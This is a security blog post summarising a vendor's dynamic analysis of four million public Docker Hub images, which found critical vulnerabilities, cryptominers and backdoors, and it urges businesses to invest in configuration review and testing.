Misconfiguration of Docker containers continues to harbor critical vulnerabilities. A recent study shows public Docker Hub images are contributing to the problem.
Earlier this month, we wrote about a Docker container vulnerability due to misconfiguration. Blackrota entered the scene, designed to exploit the exact vulnerabilities that the misconfigured containers had. Around the same time, Prevasio released the results of “Operation “Red Kangaroo”: Industry’s First Dynamic Analysis of 4M Public Docker Hub Images, and the findings were dismal. Over half of the images that were analyzed had critical vulnerabilities.
From Prevasio’s report:
“In order to handle such a massive volume of images, Prevasio Analyzer was executed non-stop for a period of one month on 800 machines running in parallel.
The result of our dynamic scan reveals that:
- 51 percent of all containers had “critical” vulnerabilities, while 13 percent were classified as “high” and four percent as “moderate” vulnerabilities.
- Six thousand containers were riddled with cryptominers, hacking tools/pen testing frameworks, and backdoor trojans. While many cryptominers and hacking tools may not be malicious per se, they present a potentially unwanted issue to an enterprise.
- More than 400 container images (with nearly 600,000 pulls) of weaponized Windows malware crossing over into the world of Linux. This crossover is directly due to the proliferation of cross-platform code (e.g. GoLang, .NET Core and PowerShell Core).
Our analysis of malicious containers also shows that quite a few images contain a dynamic payload. That is, an image in its original form does not have a malicious binary. However, at runtime, it might be scripted to download a source of a coinminer, to then compile and execute it.”
This is a really big problem. It’s clear that threat actors already know this issue exists, and have known for some time. The Docker Hub accounts for over 4 million images, which are expected to top 100 million downloads in 2020. How many companies have used these images? How many businesses are losing money they didn’t know they were losing? What will the extent of the damage from this look like when all is said and done? Unfortunately, it’s going to be a very long time before we have those answers. The impact will be far-reaching and likely costly.
This discovery illustrates another reason we say that configuration matters, and why code should be reviewed when it’s publicly available. It’s why we say that testing matters, and why we say that bringing in an expert is always a good idea, someone who can verify that your configuration looks good, your code is clean and stable and secure, and to test products before they are launched. An outside pair of eyes is always going to catch something your own team doesn’t see, and it’s because they spend so much time looking at it. Finding those misses is imperative to the security of your business.
Security isn’t just about firewalls, protocols, hackers, incident responses and magical voodoo. It’s configuration, solid code, proper testing, diligence, vigilance, and properly training non-technical employees. It’s not magic, it’s not even necessarily hard, and it is absolutely vital to the success of your business. If there’s one thing you don’t skimp on in 2021, make it security!